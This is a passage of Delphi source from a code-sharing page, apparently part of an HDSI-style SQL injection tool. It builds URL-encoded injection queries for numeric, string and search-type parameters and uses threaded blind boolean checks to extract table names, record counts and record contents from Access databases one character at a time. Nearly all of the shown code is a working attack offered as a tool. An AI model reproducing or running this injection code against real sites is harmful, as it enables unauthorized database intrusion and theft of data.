📄 main_unit.pas

📁 sql inject HDSI3--delphi.rar
💻 PAS
📖 第 1 页 / 共 5 页
字号:
上一页 1 2 3 45
         begin
              application.ProcessMessages;
              sleep(100);
         end;

          application.MessageBox(pchar('猜解结束'),pchar('提示'),mb_ok);
          exit;

    end;  //猜解access结束

    if (cjdatabase_unit.Inject_methord=0) or (define_unit.FDbName='') then
    begin
       Application.MessageBox(pchar('未进行数据库检测,不能进行！'),pchar('警告'),mb_ok);
       exit;
    end;
    
    //如果没有报错信息，进行暴力猜解表
    if cjdatabase_unit.IferrReport=false then
    begin
          begin
            Form_main.executeDBtable(main_unit.g_sContent);
            Application.MessageBox(pchar('猜解完毕'),pchar('提示'),mb_ok);
            //暴力破解完就退出
            exit;
          end;

    end;
    try
      ListView_table.Clear;
      TableCount:=GetUserTableCount(str_url);

      for i:=1 to TableCount do
      begin
          if not assigned(ThdErrorTableObj[i-1]) then
            ThdErrorTableObj[i-1]:=TThreadErrorTable.Create(true);
          ThdErrorTableObj[i-1].FURL:=str_url;
          ThdErrorTableObj[i-1].iRow:=i;
          ThdErrorTableObj[i-1].Resume;
      end;


      for i:=1 to TableCount  do
      begin
        if Form_main.stop_table= true then
        begin
          terminatethread(ThdErrorTableObj[i-1].handle,0);
          ThdErrorTableObj[i-1].Free;
          ThdErrorTableObj[i-1]:=nil;
        end;
        if assigned(ThdErrorTableObj[i-1]) then
        begin
            
            while (ThdErrorTableObj[i-1].complete=false) do
            begin
               application.ProcessMessages;
               sleep(100);
            end;
              //item:=ListView_table.Items.Add;
              //item.Caption:=(inttostr(I));
              //tableName:= ThdErrorTableObj[i-1].TableName;
              //RecordCount:=ThdErrorTableObj[i-1].RowCount;
              //ThdErrorTableObj[i-1].Free;
              //ThdErrorTableObj[i-1]:=nil;
              //item.SubItems.Add(tableName);
              //item.SubItems.Add(RecordCount);
              ThdErrorTableObj[i-1].Free;
              ThdErrorTableObj[i-1]:=nil;
              ThdObjCompleteCount:=ThdObjCompleteCount+1;


        end;

      end;


    finally
        Application.MessageBox(pchar('猜解完毕'),pchar('提示'),mb_ok);
    end;
    except
    end;
end;

procedure TForm_main.Button1Click(Sender: TObject);
begin
  GroupBox5.Visible:=true;
  Label2.Visible := true;
  suiComboBox2_url.Visible := true;
  ComboBox_URL.Visible:=false;
  t1.Show;
end;

procedure TForm_main.RzBitBtn1Click(Sender: TObject);
begin
  t2.Show;
end;

procedure TForm_main.RzBitBtn2Click(Sender: TObject);
begin
  t2.Show;
end;

procedure TForm_main.RzBitBtn3Click(Sender: TObject);
begin
  t3.Show;
end;

procedure TForm_main.RzBitBtn4Click(Sender: TObject);
begin
  t4.Show;
end;

procedure TForm_main.RzBitBtn5Click(Sender: TObject);
begin
  t5.Show;
end;

procedure TForm_main.RzBitBtn6Click(Sender: TObject);
begin
  t6.Show;
end;

procedure TForm_main.RzBitBtn7Click(Sender: TObject);
begin
  t7.Show;
end;

procedure TForm_main.RzBitBtn8Click(Sender: TObject);
begin
  t8.Show;
end;

procedure TForm_main.RzBitBtn9Click(Sender: TObject);
begin
  t9.Show;
end;
//****************************************************************
procedure TForm_main.suiButton_recordClick(Sender: TObject);
var
    j:integer;
    i:integer;
    item:TListItem;
    column:TListColumn;
    str_url:string;
    TableName:string;
    ColumnNames:TStringList;
    str_msg:string;
    Count_FieldsSelected:integer;
    FieldListSub,FieldListMain:string;
    DescStr,AscStr:string;
    condition:string;
    URL_CheckCount:string;
    Record_Count:string;//记录数
    i_Record_Count:integer;//记录数
    aresult:string;//记录内容
    URL_CheckLen,URL_CheckAsc:string;
    RecordNO:integer;
    RecordValue_Len:string;//记录的字符长度
    len:integer;// 记录的字符长度
    ii:integer;
    URL_Replaced:string;
    ipos:integer;
    recordcount:integer;
begin
try
  //初始化

    Form_main.stop_table:=true;
    Form_main.stop_column:=true;
    Form_main.stop_record:=false;
    Form_main.stop_check:=true;
    Count_FieldsSelected:=0;
    ipos:=0;
    ii:=0;
    len:=0;
    RecordNO:=0;
    i_Record_Count:=0;
  //如果没有注入地址，退出
  if suiComboBox2_url.Text='' then
    begin
      Application.MessageBox(pchar('注入地址不能为空,请添入注入地址'),pchar('警告'),mb_ok);
      exit;
    end;
  str_url:=TRIM(suiComboBox2_url.Text);
  TableName:=ListView_table.Selected.SubItems[0];
  //未猜解到表的列名，退出
  if ListView_column.Items.Count=0 then
  begin
      Application.MessageBox(pchar('未猜解表的列名,不能进行'),pchar('警告'),mb_ok);
      exit;
  end;
  //未选定表，退出
  if ListView_table.SelCount<>1 then
    begin
      Application.MessageBox(pchar('未选择需要导出表的表名，请选择'),pchar('警告'),mb_ok);
      exit;
    end;
   //access
   if cjdatabase_unit.Database_methord=3 then
   begin
        try
        //先清空记录和列名
        form_main.ListView_record.Clear;
        form_main.ListView_record.Columns.Clear;
        //构造一些sql需要的子语句
        for i:=1 to ListView_column.Items.Count do
        begin
            if ListView_column.Items[i-1].Checked then
            begin
                  Count_FieldsSelected:=Count_FieldsSelected+1;
                  FieldListSub := FieldListSub+ ListView_column.Items[i-1].SubItems[0] + ',';
                  FieldListMain := FieldListMain +'cstr([' + ListView_column.Items[i-1].SubItems[0] + '])%2Bchr(124)%2B';
            end;
        end;
        //对sql子语句进行预先处理
        If Rightstr(FieldListMain, 3)='%2B' Then FieldListMain:= Leftstr(FieldListMain, Length(FieldListMain) - 3);
        If (Count_FieldsSelected > 1) And (Rightstr(FieldListMain,11)='%2Bchr(124)') Then FieldListMain:=Leftstr(FieldListMain, Length(FieldListMain) - 11);
        If Rightstr(FieldListSub, 1)= ','  Then AscStr:= Leftstr(FieldListSub, Length(FieldListSub) - 1);
        DescStr:= stringReplace(FieldListSub, ',' , '%20desc,',[rfReplaceAll]);
        If Rightstr(DescStr, 1) = ',' Then DescStr:= Leftstr(DescStr, Length(DescStr) - 1);
        except on E:exception do
            define_unit.SaveToLogFile('c:\','access1'+E.Message);
        end;

        try
        //创建列名
        //ColumnNames:=TStringList.Create;
        for i:=1 to ListView_column.Items.Count do
        begin
            if ListView_column.Items[i-1].Checked then
            begin
              item:=ListView_column.Items[i-1];
              //ColumnNames.Add(item.SubItems[0]);
              column:=ListView_record.Columns.Add;
              column.Caption:=item.SubItems[0];
            end;
        end;
        condition:='1=1';
        if TableName='' then
          exit;
        except on E:exception do
            define_unit.SaveToLogFile('c:\','access2'+E.Message);
        end;
        try
        //构造一个sql语句
        case CJdatabase_unit.Inject_methord of
        0:  exit;
        1:  //数字型
          begin
            URL_CheckCount:=str_url+'%20and%20(select%20count(1)%20from%20['+TableName+']';
            URL_Check_End:= '';
          end;
        2: //字符型
          begin
            URL_CheckCount:= str_url+'''%20and%20(select%20count(1)%20from%20['+TableName+']';
            URL_Check_End:='%20And%20''''=''';
          end;
        3: //搜索型
           begin
            URL_CheckCount:=str_url+'%25''%20and%20(select%20count(1)%20from%20['+TableName+']';
            URL_Check_End:='%20And%20''%25''=''';
           end;
        end; //end of case
        //猜解表的记录数
        if condition>'' then  URL_CheckCount:=URL_CheckCount+ '%20Where%20' + Condition + ')';
        If  CommonCheckStr(URL_CheckCount+'<10'+ URL_Check_End)  Then
          Record_Count:= CommonGetChar(URL_CheckCount, 0, 9)
            Else If CommonCheckStr(URL_CheckCount + '<32' + URL_Check_End) Then
                      Record_Count:= CommonGetChar(URL_CheckCount, 0, 31)
                        else if CommonCheckStr(URL_CheckCount + '<52' + URL_Check_End) Then
                          Record_Count:= CommonGetChar(URL_CheckCount, 0,51)
                            Else If CommonCheckStr(URL_CheckCount+ '<100' + URL_Check_End) Then
                              Record_Count:= CommonGetChar(URL_CheckCount, 0, 99)
                                else   Record_Count:='99';

        i_Record_Count:=strtoint(Record_Count);
        except on E:exception do
            define_unit.SaveToLogFile('c:\','access3'+E.Message);
        end;


        //循环猜解记录
        for RecordNO:=1 to i_Record_Count do
        begin
              try
              item:=ListView_record.Items.Add;
              aresult:='';
              //停止退出
              if  Form_main.stop_record=true then
              begin
                  break;
              end;
              //猜解整条记录长度的sql
              case  CJdatabase_unit.Inject_methord of
               1:
                 begin
                 URL_CheckLen:=str_url+'%20and%20(select%20top%201%20len('+FieldListMain+')%20from%20(select%20top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20from%20['+tablename+']%20[CONDITION]%20order%20by%20'+AscStr+')%20T%20order%20by%20'+DescStr+')';
                 URL_CheckAsc:=str_url+'%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                 end;
                2:
                  begin
                   URL_CheckLen:=str_url+ '''%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                   URL_CheckAsc:= str_url+'''%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                  end;
                3:
                  begin
                   URL_CheckLen:=str_url+ '%25''%20And%20(Select%20Top%201%20len(' + FieldListMain + ')%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                   URL_CheckAsc:=str_url+ '%25''%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20TOrder%20by%20'+DescStr+')';
                  end;
              end;//end of case

              If Condition <>'' Then
              begin
                   URL_CheckLen:=StringReplace(URL_CheckLen, '[CONDITION]', Trim('%20Where%20' + Condition), [rfIgnoreCase]);
                   URL_CheckAsc:= StringReplace(URL_CheckAsc, '[CONDITION]', Trim('%20Where%20'+ Condition),[rfReplaceAll]);
              end
              else
                  begin
                   URL_CheckLen:= StringReplace(URL_CheckLen, '[CONDITION]','', [rfReplaceAll]);
                   URL_CheckAsc:= StringReplace(URL_CheckAsc, '[CONDITION]', '',[rfReplaceAll]);
                   end;
                   
              If CommonCheckStr(URL_CheckLen + '<=12' + URL_Check_End) Then
                   RecordValue_Len:= CommonGetChar(URL_CheckLen, 1, 12)
                 else If CommonCheckStr(URL_CheckLen + '<=32' + URL_Check_End) Then
                   RecordValue_Len:= CommonGetChar(URL_CheckLen, 1, 32)
                    else
                   RecordValue_Len:= CommonGetChar(URL_CheckLen, 1, 256);

              except on E:Exception do
                define_unit.SaveToLogFile('c:\','access4'+E.Message);
              end;

              try
              If strtoint(RecordValue_Len) > 0 Then
              begin
                 len:=strtoint(RecordValue_Len);
                 if len >=128 then  len:=128;
              end;
              //循环字符数，猜解每个字符
              For ii:= 1 To len do  //猜字符
              begin
                   if  Form_main.stop_record=true then
                     begin
                       break;
                     end;
                     URL_Replaced:= StringReplace(URL_CheckAsc, '[NUM]', inttostr(ii),[rfReplaceAll]);

                   If CommonCheckStr(URL_Replaced + '%20BETWEEN%201%20And%20256' + URL_Check_End) Then
                   begin
                        if not assigned(recordCharObj[ii]) then
                        begin
                          recordCharObj[ii-1]:=TThreadRecDataACC.Create(true);
                        end;
                        recordCharObj[ii-1].FURL:=URL_Replaced; //+ '%20BETWEEN%201%20And%20256' + URL_Check_End;
                        recordCharObj[ii-1].min_num:=1;
                        recordCharObj[ii-1].max_num:=256;
                        recordCharObj[ii-1].Resume;
                   end
                   Else If CommonCheckStr(URL_Replaced + '%20BETWEEN%201%20And%2065536' + URL_Check_End) Then
                         begin
                            if not assigned(recordCharObj[ii]) then
                            begin
                                recordCharObj[ii-1]:=TThreadRecDataACC.Create(true);
                            end;
                            recordCharObj[ii-1].FURL:=URL_Replaced;
                            recordCharObj[ii-1].min_num:=1;
                            recordCharObj[ii-1].max_num:=65536;
                            recordCharObj[ii-1].Resume;

                         end;
               end;// end of for猜解字符的循环

                except on E:exception do
                  define_unit.SaveToLogFile('c:\','access5'+E.Me
上一页 1 2 3 45
💿 文件大小 805 K
👤 上传用户 qq735970242
📂 所属分类 Delphi/CppBuilder
🏷️ 相关标签

#inject #delphi #HDSI #sql
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -